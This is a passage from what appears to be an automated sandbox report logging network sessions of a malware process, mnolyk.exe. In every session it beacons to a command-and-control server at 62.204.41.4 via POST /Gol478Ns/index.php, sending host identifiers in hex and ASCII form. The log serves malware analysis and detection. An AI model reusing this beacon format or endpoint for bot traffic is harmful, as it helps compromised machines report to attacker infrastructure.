                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      210 | 192.168.2.7 | 49905 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:57.664789915 CET | 325 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:57.728919029 CET | 325 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      211 | 192.168.2.7 | 49906 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:58.951741934 CET | 326 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.014985085 CET | 326 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:58 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      212 | 192.168.2.7 | 49907 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:59.344645023 CET | 327 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.408628941 CET | 327 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      213 | 192.168.2.7 | 49908 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:59.582545042 CET | 328 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.646224022 CET | 328 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      214 | 192.168.2.7 | 49909 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:59.832612991 CET | 329 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:59.896001101 CET | 329 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:59 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      215 | 192.168.2.7 | 49910 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:00.070255041 CET | 330 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.134892941 CET | 330 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      216 | 192.168.2.7 | 49911 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:00.309876919 CET | 331 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.373950958 CET | 331 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      217 | 192.168.2.7 | 49912 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:00.559984922 CET | 332 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.624990940 CET | 332 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      218 | 192.168.2.7 | 49913 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:00.811570883 CET | 333 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:00.876718044 CET | 333 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      219 | 192.168.2.7 | 49914 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:01.055768967 CET | 334 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.122400999 CET | 334 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      22 | 192.168.2.7 | 49716 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:06.915416002 CET | 126 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.978020906 CET | 126 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      220 | 192.168.2.7 | 49915 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:01.310914993 CET | 335 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.375654936 CET | 335 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      221 | 192.168.2.7 | 49916 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:01.554969072 CET | 336 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.617985010 CET | 336 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      222 | 192.168.2.7 | 49917 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:01.811544895 CET | 337 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:01.876722097 CET | 337 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      223 | 192.168.2.7 | 49918 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:02.062413931 CET | 338 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.127065897 CET | 338 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      224 | 192.168.2.7 | 49919 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:02.303850889 CET | 339 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.370109081 CET | 339 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      225 | 192.168.2.7 | 49920 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:02.536242008 CET | 340 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.599940062 CET | 340 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      226 | 192.168.2.7 | 49921 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:02.784331083 CET | 341 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:02.846324921 CET | 341 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      227 | 192.168.2.7 | 49922 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:03.022274971 CET | 342 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
